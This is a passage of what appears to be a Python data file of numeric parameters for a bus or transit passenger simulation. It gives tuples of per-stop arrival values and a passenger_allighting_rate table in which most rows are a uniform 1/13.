5.601660915073669, 2.2219180717036497, 1.7351991882340478, 1.030727070447689, 0.0, 14.442484938440934, 11.337997774924577, 8.675995941170239, 6.6657542151109475, 11.203321830147338, 5.467921624787015, 4.453373937334223, 3.6791279152251772, 5.395721877955516, 4.091894413271643, 2.3472271573770147, 0.9393151627017899, 0.0), (13.838721917822966, 10.275118070441435, 11.703926583814546, 12.234834470740296, 10.759039823108395, 5.14011424708562, 4.432155035927415, 3.8990536589220803, 5.592139381423722, 2.213403861254311, 1.7289379878445184, 1.0272064214747805, 0.0, 14.398266774627231, 11.299270636222584, 8.64468993922259, 6.640211583762932, 11.184278762847445, 5.458675122490913, 4.432155035927415, 3.671510176489728, 5.379519911554198, 4.0782781569134325, 2.340785316762909, 0.9341016427674034, 0.0), (13.776285853206776, 10.217011683065968, 11.670911744857346, 12.193057960546685, 10.725744210346152, 5.129192171386024, 4.410611571415708, 3.892353987624185, 5.5823855275837895, 2.2047379318469296, 1.7225624645400475, 1.0236112121536591, 0.0, 14.352870272938459, 11.259723333690248, 8.612812322700236, 6.614213795540787, 11.164771055167579, 5.44929558267386, 4.410611571415708, 3.6637086938471604, 5.362872105173076, 4.064352653515563, 2.3341823489714693, 0.9288192439150881, 0.0), (13.712453442684055, 10.15805906590867, 11.63703872157975, 12.15029012850735, 10.691524785617101, 5.117987090638052, 4.388707166621645, 3.885528329390686, 5.572373059741617, 2.1959035401258813, 1.716059685567815, 1.0199353131036961, 0.0, 14.306246963633242, 11.219288444140656, 8.580298427839075, 6.587710620377642, 11.144746119483234, 5.439739661146961, 4.388707166621645, 3.6557050647414657, 5.345762392808551, 4.050096709502451, 2.3274077443159498, 0.9234599150826065, 0.0), (13.647166501011277, 10.098171657284933, 11.602254965548024, 12.106467393895517, 10.656349416914047, 5.106473241263299, 4.366405444367763, 3.8785457240866603, 5.56207568408495, 2.1868839427355393, 1.7094167181750008, 1.016172594944264, 0.0, 14.258348376970226, 11.1778985443869, 8.547083590875005, 6.560651828206616, 11.1241513681699, 5.4299640137213245, 4.366405444367763, 3.6474808866166426, 5.3281747084570235, 4.035489131298506, 2.320450993109605, 0.9180156052077213, 0.0), (13.58036684294491, 10.037260895510144, 11.566507928328454, 12.061526175984431, 10.620185972229777, 5.094624859683358, 4.343670027476608, 3.8713752115771833, 5.551467106801532, 2.1776623963202795, 1.7026206296087845, 1.0123169282947344, 0.0, 14.20912604320803, 11.135486211242075, 8.513103148043921, 6.532987188960837, 11.102934213603064, 5.419925296208056, 4.343670027476608, 3.6390177569166844, 5.3100929861148884, 4.020508725328145, 2.313301585665691, 0.912478263228195, 0.0), (13.511996283241437, 9.97523821889969, 11.529745061487317, 12.015402894047334, 10.583002319557098, 5.082416182319821, 4.320464538770717, 3.863985831727331, 5.54052103407911, 2.168222157524475, 1.6956584871163454, 1.008362183774479, 0.0, 14.158531492605304, 11.091984021519266, 8.478292435581725, 6.504666472573423, 11.08104206815822, 5.409580164418264, 4.320464538770717, 3.6302972730855863, 5.291501159778549, 4.005134298015779, 2.3059490122974635, 0.9068398380817901, 0.0), (13.44199663665733, 9.912015065768964, 11.491913816590882, 11.968033967357464, 10.544766326888803, 5.069821445594281, 4.296752601072636, 3.8563466244021805, 5.529211172105429, 2.158546482992501, 1.688517357944864, 1.00430223200287, 0.0, 14.106516255420662, 11.047324552031569, 8.442586789724318, 6.4756394489775015, 11.058422344210857, 5.398885274163053, 4.296752601072636, 3.6213010325673434, 5.272383163444402, 3.989344655785822, 2.2983827633181764, 0.9010922787062696, 0.0), (13.37030971794905, 9.84750287443335, 11.452961645205429, 11.919355815188066, 10.505445862217693, 5.056814885928333, 4.272497837204901, 3.848426629466808, 5.517511227068235, 2.1486186293687317, 1.6811843093415195, 1.0001309435992793, 0.0, 14.053031861912746, 11.001440379592072, 8.405921546707596, 6.445855888106194, 11.03502245413647, 5.3877972812535315, 4.272497837204901, 3.612010632805952, 5.252722931108846, 3.973118605062689, 2.2905923290410857, 0.8952275340393956, 0.0), (13.29687734187308, 9.781613083208239, 11.412835998897235, 11.86930485681237, 10.465008793536564, 5.043370739743566, 4.247663869990055, 3.840194886786288, 5.505394905155279, 2.1384218532975416, 1.6736464085534917, 0.9958421891830788, 0.0, 13.998029842340188, 10.954264081013864, 8.368232042767458, 6.415265559892624, 11.010789810310557, 5.376272841500803, 4.247663869990055, 3.6024076712454045, 5.232504396768282, 3.956434952270791, 2.282567199779447, 0.8892375530189309, 0.0), (13.221641323185896, 9.714257130409019, 11.37148432923257, 11.817817511503629, 10.423422988838217, 5.029463243461577, 4.222214322250639, 3.8316204362256996, 5.492835912554298, 2.1279394114233043, 1.6658907228279605, 0.99142983937364, 0.0, 13.941461726961624, 10.905728233110038, 8.329453614139801, 6.383818234269912, 10.985671825108597, 5.364268610715979, 4.222214322250639, 3.592473745329698, 5.2117114944191085, 3.9392725038345437, 2.2742968658465146, 0.8831142845826383, 0.0), (13.144543476643964, 9.64534645435108, 11.328854087777719, 11.764830198535075, 10.380656316115449, 5.015066633503958, 4.196112816809195, 3.8226723176501176, 5.479807955453042, 2.1171545603903956, 1.6579043194121055, 0.9868877647903354, 0.0, 13.88327904603568, 10.855765412693687, 8.289521597060528, 6.351463681171186, 10.959615910906084, 5.351741244710165, 4.196112816809195, 3.582190452502827, 5.190328158057724, 3.921610066178359, 2.265770817555544, 0.8768496776682801, 0.0), (13.065525617003761, 9.574792493349808, 11.284892726098956, 11.710279337179951, 10.33667664336106, 5.000155146292303, 4.169322976488264, 3.813319570924618, 5.4662847400392565, 2.1060505568431886, 1.6496742655531065, 0.9822098360525362, 0.0, 13.82343332982099, 10.804308196577896, 8.248371327765533, 6.318151670529565, 10.932569480078513, 5.338647399294466, 4.169322976488264, 3.5715393902087875, 5.16833832168053, 3.903426445726651, 2.2569785452197917, 0.870435681213619, 0.0), (12.98452955902176, 9.502506685720592, 11.239547695762546, 11.654101346711496, 10.291451838567841, 4.984703018248201, 4.141808424110385, 3.803531235914277, 5.4522399725006885, 2.094610657426059, 1.6411876284981433, 0.9773899237796149, 0.0, 13.761876108576189, 10.751289161575762, 8.205938142490716, 6.2838319722781755, 10.904479945001377, 5.324943730279988, 4.141808424110385, 3.5605021558915717, 5.145725919283921, 3.884700448903833, 2.2479095391525097, 0.8638642441564175, 0.0), (12.901497117454435, 9.428400469778822, 11.192766448334778, 11.596232646402957, 10.2449497697286, 4.968684485793251, 4.113532782498101, 3.7932763524841717, 5.437647359025082, 2.082818118783379, 1.6324314754943956, 0.9724218985909429, 0.0, 13.698558912559907, 10.69664088450037, 8.162157377471978, 6.248454356350136, 10.875294718050164, 5.310586893477841, 4.113532782498101, 3.5490603469951787, 5.1224748848643, 3.8654108821343196, 2.2385532896669558, 0.8571273154344385, 0.0), (12.81637010705826, 9.352385283839885, 11.144496435381926, 11.536609655527563, 10.197138304836129, 4.9520737853490395, 4.084459674473953, 3.7825239604993777, 5.42248060580018, 2.0706561975595257, 1.6233928737890426, 0.9672996311058923, 0.0, 13.63343327203078, 10.640295942164814, 8.116964368945213, 6.211968592678575, 10.84496121160036, 5.295533544699129, 4.084459674473953, 3.5371955609635997, 5.098569152418064, 3.845536551842522, 2.2288992870763855, 0.8502168439854443, 0.0), (12.729090342589704, 9.274372566219169, 11.09468510847026, 11.475168793358566, 10.147985311883227, 4.934845153337166, 4.054552722860481, 3.771243099824971, 5.406713419013735, 2.058108150398871, 1.614058890629265, 0.9620169919438353, 0.0, 13.566450717247434, 10.582186911382186, 8.070294453146325, 6.174324451196611, 10.81342683802747, 5.27974033975496, 4.054552722860481, 3.524889395240833, 5.0739926559416135, 3.825056264452856, 2.2189370216940523, 0.8431247787471974, 0.0), (12.63959963880524, 9.194273755232066, 11.043279919166057, 11.411846479169196, 10.097458658862696, 4.916972826179219, 4.023775550480226, 3.759402810326029, 5.390319504853488, 2.0451572339457917, 1.6044165932622414, 0.956567851724143, 0.0, 13.49756277846851, 10.522246368965572, 8.022082966311206, 6.135471701837374, 10.780639009706976, 5.263163934456441, 4.023775550480226, 3.5121234472708704, 5.048729329431348, 3.8039488263897328, 2.2086559838332116, 0.8358430686574607, 0.0), (12.54783981046135, 9.11200028919396, 10.990228319035603, 11.346579132232703, 10.045526213767326, 4.898431040296793, 3.992091780155732, 3.7469721318676275, 5.373272569507184, 2.0317867048446603, 1.5944530489351527, 0.950946081066188, 0.0, 13.426720985952636, 10.460406891728066, 7.9722652446757625, 6.09536011453398, 10.746545139014367, 5.245760984614678, 3.992091780155732, 3.4988793144977093, 5.022763106883663, 3.7821930440775686, 2.198045663807121, 0.8283636626539964, 0.0), (12.453752672314497, 9.027463606420243, 10.935477759645158, 11.27930317182232, 9.992155844589925, 4.8791940321114815, 3.9594650347095355, 3.7339201043148416, 5.355546319162572, 2.017979819739852, 1.5841553248951779, 0.945145550589342, 0.0, 13.353876869958444, 10.39660105648276, 7.920776624475889, 6.053939459219555, 10.711092638325145, 5.227488146040779, 3.9594650347095355, 3.485138594365344, 4.996077922294963, 3.759767723940774, 2.187095551929032, 0.8206785096745677, 0.0), (12.357280039121166, 8.940575145226303, 10.878975692561012, 11.209955017211293, 9.937315419323285, 4.859236038044878, 3.9258589369641825, 3.7202157675327485, 5.337114460007395, 2.0037198352757417, 1.5735104883894968, 0.9391601309129768, 0.0, 13.278981960744572, 10.330761440042743, 7.867552441947483, 6.011159505827224, 10.67422892001479, 5.208302074545848, 3.9258589369641825, 3.4708828843177697, 4.968657709661643, 3.736651672403765, 2.1757951385122025, 0.8127795586569367, 0.0), (12.258363725637818, 8.851246343927524, 10.820669569349436, 11.138471087672855, 9.880972805960209, 4.838531294518574, 3.891237109742209, 3.705828161386424, 5.317950698229401, 1.9889900080967022, 1.562505606665289, 0.9329836926564644, 0.0, 13.201987788569642, 10.262820619221108, 7.812528033326444, 5.966970024290106, 10.635901396458802, 5.188159425940994, 3.891237109742209, 3.456093781798981, 4.940486402980104, 3.712823695890952, 2.1641339138698874, 0.804658758538866, 0.0), (12.15694554662093, 8.759388640839303, 10.760506841576703, 11.06478780248025, 9.823095872493491, 4.817054037954164, 3.85556317586616, 3.690726325740946, 5.298028740016334, 1.9737735948471096, 1.5511277469697347, 0.9266101064391765, 0.0, 13.122845883692296, 10.19271117083094, 7.755638734848673, 5.921320784541328, 10.596057480032668, 5.167016856037325, 3.85556317586616, 3.440752884252974, 4.911547936246746, 3.688262600826751, 2.1521013683153405, 0.7963080582581185, 0.0), (12.05296731682698, 8.664913474277022, 10.698434960809092, 10.988841580906726, 9.76365248691593, 4.79477850477324, 3.8188007581585754, 3.6748793004613884, 5.27732229155594, 1.958053852171337, 1.5393639765500133, 0.9200332428804852, 0.0, 13.041507776371162, 10.120365671685335, 7.696819882750066, 5.87416155651401, 10.55464458311188, 5.1448310206459436, 3.8188007581585754, 3.4248417891237426, 4.881826243457965, 3.662947193635576, 2.1396869921618182, 0.7877194067524566, 0.0), (11.943489514248384, 8.56599791046598, 10.631455938536474, 10.907723497981493, 9.699926512929064, 4.7702895112293024, 3.780085376742286, 3.6571979682329148, 5.254219782186185, 1.9413463665164579, 1.5268255340103847, 0.9130132752259121, 0.0, 12.954377375064553, 10.043146027485031, 7.634127670051924, 5.824039099549372, 10.50843956437237, 5.120077155526081, 3.780085376742286, 3.407349650878073, 4.849963256464532, 3.6359078326604983, 2.126291187707295, 0.7787270827696345, 0.0), (11.811658827165445, 8.452495802079234, 10.542317091203984, 10.804772590546145, 9.61620406376707, 4.7354436714732975, 3.734570210708573, 3.6314756885095885, 5.21942787265181, 1.9209123976394986, 1.5113111828317318, 0.9041816698244146, 0.0, 12.840684235072311, 9.94599836806856, 7.556555914158659, 5.762737192918495, 10.43885574530362, 5.084065963913424, 3.734570210708573, 3.3824597653380692, 4.808102031883535, 3.6015908635153826, 2.108463418240797, 0.7684087092799304, 0.0), (11.655795351846896, 8.323475201859713, 10.429227943941186, 10.678293012490633, 9.51084814010325, 4.689385209644506, 3.6817949987070273, 3.5970661263515646, 5.171960121188613, 1.896482260745158, 1.4926025356292107, 0.893400259851713, 0.0, 12.69827297422973, 9.827402858368842, 7.463012678146054, 5.689446782235472, 10.343920242377227, 5.0358925768921905, 3.6817949987070273, 3.3495608640317895, 4.755424070051625, 3.559431004163545, 2.0858455887882372, 0.7566795638054286, 0.0), (11.477155287337537, 8.179777273184687, 10.293395962547079, 10.529487004508074, 9.38495266590092, 4.632672092132293, 3.622145156805501, 3.5544003554065204, 5.112442542399476, 1.8682632772683756, 1.4708644412265888, 0.8807689958543429, 0.0, 12.528598471710556, 9.68845895439777, 7.354322206132943, 5.6047898318051255, 10.224885084798952, 4.976160497569129, 3.622145156805501, 3.3090514943802094, 4.69247633295046, 3.509829001502692, 2.058679192509416, 0.7436161157440625, 0.0), (11.27699483268217, 8.022243179431417, 10.136028612820661, 10.359556807291593, 9.239611565123418, 4.565862285326026, 3.5560061010718473, 3.503909449322135, 5.041501150887273, 1.836462768644093, 1.4462617484476323, 0.8663878283788393, 0.0, 12.333115606688533, 9.530266112167231, 7.231308742238162, 5.509388305932278, 10.083002301774545, 4.9054732290509895, 3.5560061010718473, 3.261330203804304, 4.619805782561709, 3.4531856024305316, 2.0272057225641325, 0.7292948344937653, 0.0), (11.056570186925597, 7.851714083977169, 9.958333360560937, 10.169704661534322, 9.075918761734068, 4.489513755615068, 3.4837632475739206, 3.4460244817460834, 4.959761961254883, 1.8012880563072504, 1.418959306116109, 0.8503567079717379, 0.0, 12.113279258337407, 9.353923787689116, 7.0947965305805445, 5.40386416892175, 9.919523922509766, 4.824434274444517, 3.4837632475739206, 3.2067955397250487, 4.537959380867034, 3.3899015538447745, 1.9916666721121876, 0.71379218945247, 0.0), (10.817137549112616, 7.669031150199204, 9.761517671566903, 9.961132807929381, 8.894968179696201, 4.404184469388787, 3.405802012379573, 3.3811765263260463, 4.867850988105186, 1.762946461692788, 1.3891219630557858, 0.8327755851795738, 0.0, 11.870544305830926, 9.160531436975312, 6.945609815278928, 5.288839385078362, 9.735701976210372, 4.733647136856465, 3.405802012379573, 3.1458460495634197, 4.447484089848101, 3.320377602643128, 1.9523035343133808, 0.6971846500181095, 0.0), (10.559953118288028, 7.475035541474793, 9.546789011637559, 9.735043487169904, 8.697853742973145, 4.310432393036548, 3.3225078115566578, 3.3097966567096977, 4.766394246041056, 1.7216453062356458, 1.35691456809043, 0.8137444105488828, 0.0, 11.606365628342832, 8.951188516037709, 6.7845728404521495, 5.164935918706936, 9.532788492082112, 4.633715319393577, 3.3225078115566578, 3.078880280740391, 4.348926871486572, 3.245014495723302, 1.909357802327512, 0.6795486855886177, 0.0), (10.286273093496636, 7.270568421181199, 9.315354846571905, 9.492638939949002, 8.485669375528229, 4.208815492947715, 3.234266061173029, 3.2323159465447184, 4.656017749665372, 1.6775919113707654, 1.322501970043808, 0.7933631346262003, 0.0, 11.322198105046873, 8.726994480888202, 6.612509850219039, 5.0327757341122945, 9.312035499330744, 4.525242325162606, 3.234266061173029, 3.0062967806769394, 4.242834687764114, 3.1642129799830014, 1.8630709693143812, 0.6609607655619273, 0.0), (9.997353673783238, 7.056470952695688, 9.06842264216894, 9.235121406959813, 8.259509001324778, 4.099891735511655, 3.14146217729654, 3.1491654694787847, 4.537347513581013, 1.6309935985330861, 1.2860490177396875, 0.7717317079580612, 0.0, 11.019496615116793, 8.489048787538673, 6.430245088698436, 4.892980795599257, 9.074695027162026, 4.408831657270299, 3.14146217729654, 2.928494096794039, 4.129754500662389, 3.0783738023199385, 1.8136845284337881, 0.6414973593359717, 0.0), (9.694451058192634, 6.833584299395522, 8.807199864227664, 8.963693128895455, 8.020466544326124, 3.9842190871177325, 3.0444815759950434, 3.0607762991595733, 4.411009552390856, 1.5820576891575493, 1.247720560001835, 0.7489500810910016, 0.0, 10.69971603772634, 8.238450892001017, 6.2386028000091756, 4.746173067472647, 8.822019104781711, 4.285086818823403, 3.0444815759950434, 2.8458707765126663, 4.010233272163062, 2.987897709631819, 1.7614399728455332, 0.6212349363086839, 0.0), (9.378821445769624, 6.602749624657969, 8.53289397854708, 8.67955634644906, 7.769635928495594, 3.8623555141553156, 2.9437096733363934, 2.9675795092347634, 4.277629880697781, 1.5309915046790952, 1.2076814456540184, 0.7251182045715564, 0.0, 10.364311252049257, 7.976300250287119, 6.038407228270092, 4.592974514037284, 8.555259761395561, 4.154611312928669, 2.9437096733363934, 2.7588253672537966, 3.884817964247797, 2.8931854488163538, 1.706578795709416, 0.6002499658779973, 0.0), (9.051721035559014, 6.3648080918602945, 8.24671245092618, 8.383913300313743, 7.508111077796515, 3.7348589830137664, 2.8395318853884426, 2.870006173352032, 4.137834513104661, 1.4780023665326634, 1.1660965235200045, 0.7003360289462612, 0.0, 10.014737137259289, 7.7036963184088725, 5.830482617600023, 4.43400709959799, 8.275669026209322, 4.018008642692845, 2.8395318853884426, 2.6677564164384044, 3.7540555388982577, 2.7946377667712485, 1.649342490185236, 0.5786189174418451, 0.0), (8.7144060266056, 6.12060086437976, 7.949862747163971, 8.077966231182643, 7.23698591619222, 3.602287460082452, 2.7323336282190445, 2.7684873651590554, 3.992249464214377, 1.4232975961531957, 1.1231306424235596, 0.6747035047616515, 0.0, 9.652448572530185, 7.421738552378166, 5.615653212117798, 4.269892788459586, 7.984498928428754, 3.8758823112226777, 2.7323336282190445, 2.5730624714874657, 3.61849295809611, 2.692655410394215, 1.5899725494327943, 0.5564182603981601, 0.0), (8.368132617954185, 5.870969105593635, 7.643552333059449, 7.762917379748876, 6.9573543676460305, 3.4651989117507385, 2.6225003178960526, 2.663454158303514, 3.8415007486298056, 1.3670845149756323, 1.0789486511884518, 0.648320582564263, 0.0, 9.278900437035686, 7.1315264082068905, 5.3947432559422595, 4.101253544926896, 7.683001497259611, 3.7288358216249198, 2.6225003178960526, 2.475142079821956, 3.4786771838230153, 2.587639126582959, 1.52871046661189, 0.5337244641448761, 0.0), (8.014157008649567, 5.616753978879182, 7.328988674411616, 7.439968986705571, 6.6703103561212815, 3.3241513044079904, 2.51041737048732, 2.5553376264330825, 3.6862143809538255, 1.309570444434913, 1.0337153986384477, 0.62128721290063, 0.0, 8.89554760994954, 6.83415934190693, 5.168576993192238, 3.9287113333047383, 7.372428761907651, 3.5774726770063157, 2.51041737048732, 2.37439378886285, 3.3351551780606408, 2.479989662235191, 1.4657977348823235, 0.5106139980799257, 0.0), (7.6537353977365505, 5.358796647613667, 7.00737923701947, 7.110323292745849, 6.376947805581297, 3.179702604443573, 2.3964702020607005, 2.4445688431954404, 3.527016375789314, 1.250962705965979, 0.9875957335973142, 0.5937033463172892, 0.0, 8.503844970445494, 6.53073680949018, 4.93797866798657, 3.7528881178979363, 7.054032751578628, 3.4223963804736166, 2.3964702020607005, 2.2712161460311235, 3.1884739027906486, 2.370107764248617, 1.401475847403894, 0.4871633316012425, 0.0), (7.288123984259929, 5.097938275174352, 6.679931486682011, 6.7751825385628415, 6.078360639989406, 3.0324107782468537, 2.2810442286840464, 2.331578882238264, 3.36453274773915, 1.19146862100377, 0.9407545048888186, 0.5656689333607753, 0.0, 8.105247397697292, 6.222358266968527, 4.703772524444093, 3.574405863011309, 6.7290654954783, 3.26421043513357, 2.2810442286840464, 2.1660076987477526, 3.039180319994703, 2.2583941795209475, 1.3359862973364023, 0.46344893410675936, 0.0), (6.91857896726451, 4.835020024938507, 6.347852889198238, 6.435748964849671, 5.775642783308939, 2.882833792207196, 2.164524866425212, 2.216798817209233, 3.199389511406209, 1.131295510983227, 0.8933565613367281, 0.537283924577624, 0.0, 7.701209770878679, 5.910123170353863, 4.46678280668364, 3.39388653294968, 6.398779022812418, 3.103518344092926, 2.164524866425212, 2.0591669944337117, 2.8878213916544695, 2.1452496549498905, 1.2695705778396478, 0.4395472749944098, 0.0), (6.546356545795092, 4.570883060283395, 6.012350910367152, 6.093224812299459, 5.469888159503225, 2.731529612713966, 2.0472975313520503, 2.100659721756022, 3.0322126813933705, 1.07065069733929, 0.8455667517648098, 0.5086482705143706, 0.0, 7.2931869691634, 5.595130975658075, 4.227833758824048, 3.211952092017869, 6.064425362786741, 2.9409236104584306, 2.0472975313520503, 1.9510925805099755, 2.7349440797516125, 2.0310749374331536, 1.2024701820734305, 0.4155348236621269, 0.0), (6.172712918896475, 4.306368544586282, 5.6746330159877525, 5.74881232160534, 5.162190692535588, 2.5790562061565305, 1.929747639532414, 1.9835926695263104, 2.863628272303512, 1.0097415015069002, 0.7975499249968301, 0.4798619217175504, 0.0, 6.882633871725203, 5.278481138893053, 3.98774962498415, 3.0292245045207, 5.727256544607024, 2.7770297373368344, 1.929747639532414, 1.8421830043975218, 2.581095346267794, 1.916270773868447, 1.1349266031975505, 0.3914880495078438, 0.0), (0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0))
passenger_allighting_rate = ((0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), (0, 0.07692307692307693, 